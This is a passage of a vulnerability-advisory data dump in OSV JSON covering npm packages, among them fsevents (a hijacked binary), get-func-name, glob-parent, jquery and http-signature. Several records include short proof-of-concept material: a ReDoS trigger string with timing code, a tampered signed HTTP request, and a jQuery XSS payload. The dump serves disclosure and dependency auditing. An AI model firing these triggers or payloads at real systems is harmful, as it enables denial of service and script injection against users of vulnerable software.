registration. A third party, unrelated to the fsevents maintainers, subsequently claimed this namespace and in April 2023 this third party started serving modified versions of the “fse.node” binary executable artifact to new fsevents v1.x users. \n\nAs of April 27, 2023 the cloud storage resource in question has been indefinitely suspended and is no longer serving binaries.\n\nThe affected cloud storage pre-fetch was [removed](https://github.com/fsevents/fsevents/commit/909af26846834642c81d19f4148afa3b7557b058) in fsevents version 1.2.11.\n\n## Impact\n\nThe impact of the modified versions of fse.node appears to be limited to information gathering. \n\nNote that initial analysis was performed for the modified artifact associated with fsevents v1.2.9, which was distributed as fse-v1.2.9-node-v72-darwin-x64.tar.gz prior to the cloud storage resource being suspended. \n\nFor more detailed analysis you may compare a decompilation of the v1.x fse.node artifacts on your systems with the intended fsevents v1.x source as it exists at https://github.com/fsevents/fsevents/tree/v1.x \n\n## How to fix it\n\nIf you are dependent on the deprecated version of fsevents v1.x, the recommended course of action is to upgrade to fsevents v2.x or remove the dependency altogether as currently maintained versions of Node.js no longer require fsevents for file system watching on macOS.\n", "affected": [ { "package": { "name": "fsevents", "ecosystem": "npm", "purl": "pkg:npm/fsevents" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.11" } ] } ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/fsevents/MAL-2023-462.json" } } ], "references": [ { "type": "WEB", "url": "https://www.npmjs.com/package/fsevents" }, { "type": "WEB", "url": "https://github.com/fsevents/fsevents/commit/909af26846834642c81d19f4148afa3b7557b058" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xv2f-5jw4-v95m" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-xv2f-5jw4-v95m", "import_time": "2023-07-30T21:58:32.873496549Z", "modified_time": "2023-05-01T15:47:26Z", "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.11" } ], "type": "SEMVER" } ], "sha256": "acdc3ae57250fab51aeff6e3938ed40197a1b74eb688a72cd5d7eee0c77a7167", "source": "ghsa-malware" } ] } }, { "schema_version": "1.7.3", "id": "GHSA-4q6p-r6v2-jvc5", "published": "2023-09-27T20:16:00Z", "modified": "2023-11-08T04:13:31.847974Z", "aliases": [ "CVE-2023-43646" ], "related": [ "CGA-6527-pf2q-fc57", "CVE-2023-43646" ], "summary": "Chaijs/get-func-name vulnerable to ReDoS", "details": "The current regex implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows:\n\n```js\nconst functionNameMatch = /\\s*function(?:\\s|\\s*\\/\\*[^(?:*/)]+\\*\\/\\s*)*([^\\s(/]+)/;\n```\n\nThis vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:\n\n```js\n'\\t'.repeat(54773) + '\\t/function/i'\n```\n\nHere is a simple PoC code to demonstrate the issue:\n\n```js\nconst protocolre = /\\sfunction(?:\\s|\\s/*[^(?:*\\/)]+*/\\s*)*([^\\(\\/]+)/;\n\nconst startTime = Date.now();\nconst maliciousInput = '\\t'.repeat(54773) + '\\t/function/i'\n\nprotocolre.test(maliciousInput);\n\nconst endTime = Date.now();\n\nconsole.log(\"process time: \", endTime - startTime, \"ms\");\n```", "affected": [ { "package": { "name": "get-func-name", "ecosystem": "npm", "purl": "pkg:npm/get-func-name" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-4q6p-r6v2-jvc5/GHSA-4q6p-r6v2-jvc5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43646" }, { "type": "WEB", "url": "https://github.com/chaijs/get-func-name/commit/f934b228b5e2cb94d6c8576d3aac05493f667c69" }, { "type": "PACKAGE", "url": "https://github.com/chaijs/get-func-name" }, { "type": "WEB", "url": "https://github.com/chaijs/get-func-name/blob/78ad756441a83f3dc203e50f76c113ae3ac017dc/index.js#L15" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-09-27T20:16:00Z", "nvd_published_at": "2023-09-27T15:19:34Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cj88-88mr-972w", "published": "2022-07-18T17:03:23Z", "modified": "2025-04-14T22:13:25Z", "aliases": [ "BIT-gulp-2021-35065", "CVE-2021-35065" ], "summary": "glob-parent 6.0.0 vulnerable to Regular Expression Denial of Service", "details": "glob-parent 6.0.0 is vulnerable to Regular Expression Denial of Service (ReDoS). This issue is fixed in version 6.0.1.\n\nThis vulnerability is separate from [GHSA-ww39-953v-wcq6](https://github.com/advisories/GHSA-ww39-953v-wcq6).", "affected": [ { "package": { "name": "glob-parent", "ecosystem": "npm", "purl": "pkg:npm/glob-parent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.1" } ] } ], "versions": [ "6.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj88-88mr-972w/GHSA-cj88-88mr-972w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35065" }, { "type": "WEB", "url": "https://github.com/opensearch-project/OpenSearch-Dashboards/issues/1103" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/pull/49" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/commit/32f6d52663b7addac38d0dff570d8127edf03f47" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/commit/3e9f04a3b4349db7e1962d87c9a7398cda51f339" }, { "type": "PACKAGE", "url": "https://github.com/gulpjs/glob-parent" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/releases/tag/v6.0.1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230214-0010" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-GLOBPARENT-1314294" }, { "type": "WEB", "url": "https://www.mend.io/vulnerability-database/CVE-2021-35065" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-07-18T17:03:23Z", "nvd_published_at": "2022-12-26T07:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ww39-953v-wcq6", "published": "2021-06-07T21:56:34Z", "modified": "2025-01-14T08:57:10.357296Z", "aliases": [ "BIT-gulp-2020-28469", "CVE-2020-28469" ], "summary": "glob-parent vulnerable to Regular Expression Denial of Service in enclosure regex", "details": "This affects the package glob-parent before 5.1.2. The enclosure regex used to check for strings ending in enclosure containing path separator.", "affected": [ { "package": { "name": "glob-parent", "ecosystem": "npm", "purl": "pkg:npm/glob-parent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "5.1.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-ww39-953v-wcq6/GHSA-ww39-953v-wcq6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/pull/36" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/pull/36/commits/c6db86422a9731d4f3d332ce4a81c27ea6b0ee46" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/commit/4a80667c69355c76a572a5892b0f133c8e1f457e" }, { "type": "PACKAGE", "url": "https://github.com/gulpjs/glob-parent" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/blob/6ce8d11f2f1ed8e80a9526b1dc8cf3aa71f43474/index.js%23L9" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/releases/tag/v5.1.2" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBES128-1059093" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059092" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-06-04T18:30:45Z", "nvd_published_at": "2021-06-03T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r9q4-w3fm-wrm2", "published": "2020-09-02T21:21:43Z", "modified": "2021-09-27T21:01:47Z", "summary": "Cross-Site Scripting in google-closure-library", "details": "Versions of `google-closure-library` prior to 20190301.0.0 are vulnerable to Cross-Site Scripting. The `safedomtreeprocessor.processToString()` function improperly processed empty elements, which could allow attackers to execute arbitrary JavaScript through Mutation Cross-Site Scripting.\n\n\n## Recommendation\n\nUpgrade to version 20190301.0.0 or later.", "affected": [ { "package": { "name": "google-closure-library", "ecosystem": "npm", "purl": "pkg:npm/google-closure-library" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "20190301.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-r9q4-w3fm-wrm2/GHSA-r9q4-w3fm-wrm2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa#commitcomment-33294853" }, { "type": "PACKAGE", "url": "https://github.com/google/closure-library" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GOOGLECLOSURELIBRARY-174519" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/878" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:39:08Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-vh5w-fg69-rc8m", "published": "2021-05-07T16:06:34Z", "modified": "2023-11-08T04:04:19.217106Z", "aliases": [ "CVE-2020-8910" ], "summary": "Improper Input Validation in Google Closure Library", "details": "A URL parsing issue in goog.uri of the Google Closure Library versions up to and including v20200224 allows an attacker to send malicious URLs to be parsed by the library and return the wrong authority. Mitigation -- update your library to version v20200315.", "affected": [ { "package": { "name": "google-closure-library", "ecosystem": "npm", "purl": "pkg:npm/google-closure-library" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "20200315.0.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 20200224.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-vh5w-fg69-rc8m/GHSA-vh5w-fg69-rc8m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8910" }, { "type": "WEB", "url": "https://github.com/google/closure-library/commit/294fc00b01d248419d8f8de37580adf2a0024fc9" }, { "type": "WEB", "url": "https://github.com/google/closure-library/releases/tag/v20200315" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2021-05-06T20:57:55Z", "nvd_published_at": "2020-03-26T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qh2h-chj9-jffq", "published": "2018-06-08T12:43:43Z", "modified": "2023-11-08T03:59:01.241655Z", "aliases": [ "CVE-2017-16042" ], "summary": "Growl before 1.10.0 vulnerable to Command Injection", "details": "Affected versions of `growl` do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.\n\n\n## Recommendation\n\nUpdate to version 1.10.0 or later.", "affected": [ { "package": { "name": "growl", "ecosystem": "npm", "purl": "pkg:npm/growl" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/06/GHSA-qh2h-chj9-jffq/GHSA-qh2h-chj9-jffq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16042" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/issues/60" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/pull/61" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/pull/62" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/commit/d71177d5331c9de4658aca62e0ac921f178b0669" }, { "type": "PACKAGE", "url": "https://github.com/tj/node-growl" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/146" } ], "database_specific": { "cwe_ids": [ "CWE-78", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:51:54Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pfq8-rq6v-vf5m", "published": "2022-10-31T19:00:36Z", "modified": "2025-06-11T17:34:37Z", "aliases": [ "CVE-2022-37620" ], "related": [ "CGA-mvv3-xjv4-w9gc" ], "summary": "kangax html-minifier REDoS vulnerability", "details": "A Regular Expression Denial of Service (ReDoS) flaw was found in kangax html-minifier 4.0.0 because of the reCustomIgnore regular expression.", "affected": [ { "package": { "name": "html-minifier", "ecosystem": "npm", "purl": "pkg:npm/html-minifier" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-pfq8-rq6v-vf5m/GHSA-pfq8-rq6v-vf5m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37620" }, { "type": "WEB", "url": "https://github.com/kangax/html-minifier/issues/1135" }, { "type": "PACKAGE", "url": "https://github.com/kangax/html-minifier" }, { "type": "WEB", "url": "https://github.com/kangax/html-minifier/blob/51ce10f4daedb1de483ffbcccecc41be1c873da2/src/htmlminifier.js#L1338" }, { "type": "WEB", "url": "https://github.com/kangax/html-minifier/blob/51ce10f4daedb1de483ffbcccecc41be1c873da2/src/htmlminifier.js#L294" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-HTMLMINIFIER-3091181" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-04-22T23:06:37Z", "nvd_published_at": "2022-10-31T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-86wf-436m-h424", "published": "2022-01-06T20:30:13Z", "modified": "2023-11-08T04:00:42.433382Z", "aliases": [ "CVE-2019-10196" ], "summary": "Resource Exhaustion Denial of Service in http-proxy-agent ", "details": "A flaw was found in http-proxy-agent, prior to version 2.1.0. It was discovered http-proxy-agent passes an auth option to the Buffer constructor without proper sanitization. This could result in a Denial of Service through the usage of all available CPU resources and data exposure through an uninitialized memory leak in setups where an attacker could submit typed input to the auth parameter.", "affected": [ { "package": { "name": "http-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/http-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-86wf-436m-h424/GHSA-86wf-436m-h424.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10196" }, { "type": "WEB", "url": "https://github.com/TooTallNate/node-http-proxy-agent/commit/b7b7cc793c3226aa83f820ce5c277e81862d32eb" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1567245" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/607" } ], "database_specific": { "cwe_ids": [ "CWE-665" ], "github_reviewed": true, "github_reviewed_at": "2021-03-22T22:28:09Z", "nvd_published_at": "2021-03-19T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8w57-jfpm-945m", "published": "2019-06-11T16:16:07Z", "modified": "2023-04-11T00:26:58Z", "summary": "Denial of Service in http-proxy-agent", "details": "Versions of `http-proxy-agent` before 2.1.0 are vulnerable to denial of service and uninitialized memory leak when unsanitized options are passed to `Buffer`. An attacker may leverage these unsanitized options to consume system resources.\n\n\n## Recommendation\n\nUpdate to version 2.1.0 or later.", "affected": [ { "package": { "name": "http-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/http-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-8w57-jfpm-945m/GHSA-8w57-jfpm-945m.json" } } ], "references": [ { "type": "WEB", "url": "https://hackerone.com/reports/321631" }, { "type": "WEB", "url": "https://github.com/TooTallNate/node-http-proxy-agent/blob/2.0.0/index.js#L80" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/607" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-11T16:11:38Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-q257-vv4p-fg92", "published": "2018-11-09T17:49:34Z", "modified": "2023-11-08T03:58:59.280300Z", "aliases": [ "CVE-2017-16005" ], "summary": "Header Forgery in http-signature", "details": "Affected versions of `http-signature` contain a vulnerability which can allow an attacker in a privileged network position to modify header names and change the meaning of the request, without requiring an updated signature. \n\nThis problem occurs because vulnerable versions of `http-signature` sign the contents of headers, but not the header names.\n\n## Proof of Concept\n\nConsider this to be the initial, untampered request:\n```http\nPOST /pay HTTP/1.1\nHost: example.com\nDate: Thu, 05 Jan 2012 21:31:40 GMT\nX-Payment-Source: src@money.com\nX-Payment-Destination: dst@money.com\nAuthorization: Signature keyId=\"Test\",algorithm=\"rsa-sha256\",headers=\"x-payment-source x-payment-destination\" MDyO5tSvin5...\n```\n\nAnd the request is intercepted and tampered as follows:\n```http\nX-Payment-Source: dst@money.com // Emails switched\nX-Payment-Destination: src@money.com\nAuthorization: Signature keyId=\"Test\",algorithm=\"rsa-sha256\",headers=\"x-payment-destination x-payment-source\" MDyO5tSvin5...\n```\n\nIn the resulting responses, both requests would pass signature verification without issue.\n```\nsrc@money.com\\n\ndst@money.com\\n\n```\n\n\n\n## Recommendation\n\nUpdate to version 0.10.0 or higher.", "affected": [ { "package": { "name": "http-signature", "ecosystem": "npm", "purl": "pkg:npm/http-signature" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-q257-vv4p-fg92/GHSA-q257-vv4p-fg92.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16005" }, { "type": "WEB", "url": "https://github.com/joyent/node-http-signature/issues/10" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-q257-vv4p-fg92" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/318" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:50:21Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8g7p-74h8-hg48", "published": "2018-07-27T17:04:52Z", "modified": "2023-11-08T04:00:18.222205Z", "aliases": [ "CVE-2018-3739" ], "summary": "Denial of Service in https-proxy-agent", "details": "Versions of `https-proxy-agent` before 2.2.0 are vulnerable to denial of service. This is due to unsanitized options (proxy.auth) being passed to `Buffer()`.\n\n\n## Recommendation\n\nUpdate to version 2.2.0 or later.", "affected": [ { "package": { "name": "https-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/https-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.2.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-8g7p-74h8-hg48/GHSA-8g7p-74h8-hg48.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3736" }, { "type": "WEB", "url": "https://github.com/TooTallNate/node-https-proxy-agent/commit/1c24219df87524e6ed973127e81f30801d658f07" }, { "type": "WEB", "url": "https://hackerone.com/reports/319532" }, { "type": "PACKAGE", "url": "https://github.com/TooTallNate/node-https-proxy-agent" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-8g7p-74h8-hg48" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/593" } ], "database_specific": { "cwe_ids": [ "CWE-125", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:25:32Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pc5p-h8pf-mvwp", "published": "2020-04-16T03:14:56Z", "modified": "2023-11-01T20:54:11Z", "summary": "Machine-In-The-Middle in https-proxy-agent", "details": "Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials.\n\n\n## Recommendation\n\nUpgrade to version 3.0.0 or 2.2.3.", "affected": [ { "package": { "name": "https-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/https-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-pc5p-h8pf-mvwp/GHSA-pc5p-h8pf-mvwp.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b" }, { "type": "WEB", "url": "https://hackerone.com/reports/541502" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1184" } ], "database_specific": { "cwe_ids": [ "CWE-300" ], "github_reviewed": true, "github_reviewed_at": "2020-04-16T03:03:19Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2pqj-h3vj-pqgw", "published": "2020-09-01T16:41:46Z", "modified": "2024-03-08T05:20:14.907785Z", "aliases": [ "CVE-2012-6708" ], "summary": "Cross-Site Scripting in jquery", "details": "Affected versions of `jquery` are vulnerable to cross-site scripting. This occurs because the main `jquery` function uses a regular expression to differentiate between HTML and selectors, but does not properly anchor the regular expression. The result is that `jquery` may interpret HTML as selectors when given certain inputs, allowing for client side code execution.\n\n## Proof of Concept\n```\n$(\"#log\").html(\n $(\"element[attribute='\u003cimg src=\\\"x\\\" onerror=\\\"alert(1)\\\" /\u003e']\").html()\n);\n```\n\n\n\n\n## Recommendation\n\nUpdate to version 1.9.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.9.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.7.2", "1.7.3", "1.8.2", "1.8.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.2.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16011" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6708" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/05531fc4080ae24070930d15ae0cea7ae056457d" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227132049/http://www.securityfocus.com/bid/102792" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jquery:20120206" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450223" }, { "type": "WEB", "url": "https://research.insecurelabs.org/jquery/test" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2012-6708.yml" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v2.2.0/vendor/assets/javascripts/jquery.js#L67" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L59" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/9521" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/6429" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/12531" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/11290" }, { "type": "WEB", "url": 